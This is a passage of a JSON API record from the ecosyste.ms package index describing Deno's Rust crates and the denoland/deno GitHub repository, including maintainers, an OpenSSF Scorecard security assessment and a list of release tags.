ttps://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"littledivy","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"dsherret","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"crowlKats","count":32,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"devsnek","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"denobot","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"magurotuna","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"piscisaureus","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"ry","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"lucacasonato","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"kt3k","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_webgpu/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_webgpu/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_webgpu/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_webgpu/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_webgpu/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_webgpu/codemeta","maintainers":[{"uuid":"91327","login":"bartlomieju","name":"Bartek Iwańczuk","email":null,"url":"https://github.com/bartlomieju","packages_count":116,"html_url":"https://crates.io/users/bartlomieju","role":null,"created_at":"2022-11-07T18:29:37.748Z","updated_at":"2022-11-07T18:29:37.748Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/bartlomieju/packages"},{"uuid":"221986","login":"denobot","name":null,"email":null,"url":"https://github.com/denobot","packages_count":106,"html_url":"https://crates.io/users/denobot","role":null,"created_at":"2023-07-25T12:00:52.727Z","updated_at":"2023-07-25T12:00:52.727Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/denobot/packages"}],"registry":{"name":"crates.io","url":"https://crates.io","ecosystem":"cargo","default":true,"packages_count":334031,"maintainers_count":70996,"namespaces_count":0,"keywords_count":71627,"github":"rust-lang","metadata":{"funded_packages_count":30452,"rate_limit":2},"icon_url":"https://github.com/rust-lang.png","created_at":"2022-04-04T15:19:22.689Z","updated_at":"2026-09-01T05:05:21.464Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/namespaces"}},{"id":4047089,"name":"deno_cli","ecosystem":"cargo","description":"A secure JavaScript/TypeScript runtime built with V8, Rust, and Tokio","homepage":null,"licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/denoland/deno","keywords_array":[],"namespace":null,"versions_count":14,"first_release_published_at":"2019-04-01T19:51:28.856Z","latest_release_published_at":"2020-01-17T19:13:00.672Z","latest_release_number":"0.23.3","last_synced_at":"2026-08-29T21:57:31.684Z","created_at":"2022-04-12T09:58:19.537Z","updated_at":"2026-08-29T21:57:31.685Z","registry_url":"https://crates.io/crates/deno_cli/","install_command":"cargo install deno_cli","documentation_url":"https://docs.rs/deno_cli/","metadata":{"categories":[]},"repo_metadata":{"id":37251508,"uuid":"133442384","full_name":"denoland/deno","owner":"denoland","description":"A modern runtime for JavaScript and TypeScript.","archived":false,"fork":false,"pushed_at":"2026-08-22T12:52:12.000Z","size":247311,"stargazers_count":108275,"open_issues_count":1528,"forks_count":6351,"subscribers_count":1426,"default_branch":"main","last_synced_at":"2026-08-22T15:40:08.889Z","etag":null,"topics":["deno","javascript","rust","typescript"],"latest_commit_sha":null,"homepage":"https://deno.com","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/denoland.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":".github/CONTRIBUTING.md","funding":null,"license":"LICENSE.md","code_of_conduct":".github/CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":".github/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":".github/copilot-instructions.md","dco":null,"cla":null,"disclosure":null}},"created_at":"2018-05-15T01:34:26.000Z","updated_at":"2026-08-22T14:38:59.000Z","dependencies_parsed_at":"2026-08-08T17:34:36.142Z","dependency_job_id":null,"html_url":"https://github.com/denoland/deno","commit_stats":{"total_commits":12946,"total_committers":999,"mean_commits":12.95895895895896,"dds":0.8464390545342191,"last_synced_commit":"9ad0d4c3db85ce9f8007dc088d164bcc7f544708"},"previous_names":[],"tags_count":440,"template":false,"template_full_name":null,"purl":"pkg:github/denoland/deno","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","download_url":"https://codeload.github.com/denoland/deno/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/sbom","scorecard":{"id":334411,"data":{"date":"2025-08-11","repo":{"name":"github.com/denoland/deno","commit":"228574b04210ad54baf04126810e2c113a462bcc"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 14 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: .github/SECURITY.md:1","Info: Found linked content: .github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: .github/SECURITY.md:1","Info: Found text in security policy: .github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/promote_to_release.yml:24","Warn: no topLevel permission defined: .github/workflows/cargo_publish.yml:1","Warn: topLevel 'contents' permission set to 'write': .github/workflows/ci.yml:5","Warn: no topLevel permission defined: .github/workflows/node_compat_test.yml:1","Warn: no topLevel permission defined: .github/workflows/post_publish.yml:1","Warn: no topLevel permission defined: .github/workflows/pr.yml:1","Warn: no topLevel permission defined: .github/workflows/promote_to_release.yml:1","Warn: no topLevel permission defined: .github/workflows/start_release.yml:1","Warn: no topLevel permission defined: .github/workflows/version_bump.yml:1","Warn: no topLevel permission defined: .github/workflows/wpt_epoch.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.md:0","Info: FSF or OSI recognized license: MIT License: LICENSE.md:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Binary-Artifacts","score":5,"reason":"binaries present in source code","details":["Warn: binary detected: tests/specs/npm/pkg_index_ts_and_js/node_modules/package/wasm/index.wasm:1","Warn: binary detected: tests/specs/run/error_bad_wasm_import/toolkit.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/cjs_importing/math.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/table_global_memory/mod.wasm:1","Warn: binary detected: tests/specs/run/wasm_unreachable/unreachable.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Branch-Protection","score":8,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'force pushes' disabled on branch 'main'","Warn: required approving review count is 1 on branch 'main'","Warn: codeowners review is not required on branch 'main'","Info: status check found to merge onto on branch 'main'","Info: PRs are required in order to make changes on branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact v2.4.4 not signed: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 not signed: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 not signed: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 not signed: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 not signed: https://api.github.com/repos/denoland/deno/releases/230701638","Warn: release artifact v2.4.4 does not have provenance: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 does not have provenance: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 does not have provenance: https://api.github.com/repos/denoland/deno/releases/230701638"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/npm_publish.yml:16"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:790: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:795: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:822: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:829: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:153: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:182: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:194: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:198: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:202: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:216: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:226: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:240: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:251: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:384: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:401: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:462: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:509: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:522: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:731: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:766: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:22: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:63: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:67: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/post_publish.yml:14: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/pr.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/pr.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:65: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:73: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:104: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:119: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:125: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:133: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:138: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:155: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/start_release.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/start_release.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/version_bump.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:43: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:38: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: containerImage not pinned by hash: .devcontainer/Dockerfile:1: pin your Docker image by updating mcr.microsoft.com/devcontainers/rust:1 to mcr.microsoft.com/devcontainers/rust:1@sha256:fc57fb865035c5395e85246c8842b071ced6e7cde727b3c98abbcc794eaf4759","Warn: downloadThenRun not pinned by hash: .devcontainer/Dockerfile:10","Info:   0 out of  25 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of  35 third-party GitHubAction dependencies pinned","Info:   0 out of   1 containerImage dependencies pinned","Info:   0 out of   1 downloadThenRun dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":6,"reason":"4 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-v7pc-74h8-xq2h","Warn: Project is vulnerable to: RUSTSEC-2025-0006","Warn: Project is vulnerable to: RUSTSEC-2024-0436","Warn: Project is vulnerable to: RUSTSEC-2023-0071 / GHSA-4grx-2x9w-596c / GHSA-c38w-74pg-36hr"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T04:23:13.226Z","repository_id":37251508,"created_at":"2025-08-18T04:23:13.226Z","updated_at":"2025-08-18T04:23:13.226Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36827962,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"ssl_error","status_checked_at":"2026-08-22T15:14:58.237Z","response_time":51,"last_error":"SSL_read: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"denoland","name":"Deno","uuid":"42048915","kind":"organization","description":"","email":"support@deno.com","website":"https://deno.land","location":null,"twitter":"deno_land","company":null,"icon_url":"https://avatars.githubusercontent.com/u/42048915?v=4","repositories_count":89,"last_synced_at":"2023-04-09T21:37:02.792Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/denoland","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-02T16:32:27.195Z","updated_at":"2023-04-09T21:37:03.563Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland/repositories"},"tags":[{"name":"v2.9.5","sha":"17fadf33a8df3af9488b9f42efd1f2290d6dc7a3","kind":"commit","published_at":"2026-08-06T11:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5/manifests"},{"name":"v2.9.4","sha":"14eea3160ae5834476aa3b9d317b8d41d991b982","kind":"commit","published_at":"2026-07-23T14:13:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4/manifests"},{"name":"v2.9.3","sha":"f39575ecd50602a5b42b1ba8e93849460de9fcf4","kind":"commit","published_at":"2026-07-15T13:38:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3/manifests"},{"name":"v2.9.2","sha":"356c132ed60e679b34535a287a493193aa8bb6a4","kind":"commit","published_at":"2026-07-08T10:45:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"7afe265234add47e7602f2e91c318f3eff245aa8","kind":"commit","published_at":"2026-07-01T13:28:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"94d375ddd02b7b9eb464781e4bd9e68bf262aacc","kind":"commit","published_at":"2026-06-25T11:49:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denolan